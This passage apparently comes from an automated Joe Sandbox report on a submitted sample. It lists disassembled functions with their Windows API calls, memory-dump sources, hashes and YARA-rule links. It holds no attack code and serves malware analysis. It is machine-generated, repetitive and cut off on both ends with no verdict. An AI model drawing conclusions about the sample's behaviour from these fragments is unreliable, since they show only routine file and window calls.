                                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                  • String ID: nsa
                                                                                                                                                                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                  • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                  • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                  Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 811 402175-40218b call 401446 * 2 816 402198-40219d 811->816 817 40218d-402197 call 4062cf 811->817 818 4021aa-4021b0 EnableWindow 816->818 819 40219f-4021a5 ShowWindow 816->819 817->816 821 4030e3-4030f2 818->821 819->821
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                  • String ID: HideWindow
                                                                                                                                                                                                                                                                  • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                  • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                  • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                  Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                  • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                  Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                                                                                                                                  • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                  • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                  Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                  • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                  Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                  • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                  • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                  Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                    • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                  • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                  • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                  Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                  • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                  • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                  Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                  • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                  Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                  • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                  Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                  • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                  • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                                                                                                  Function 00403885 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(FFFFFFFF,00403AFD,?), ref: 00403890
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
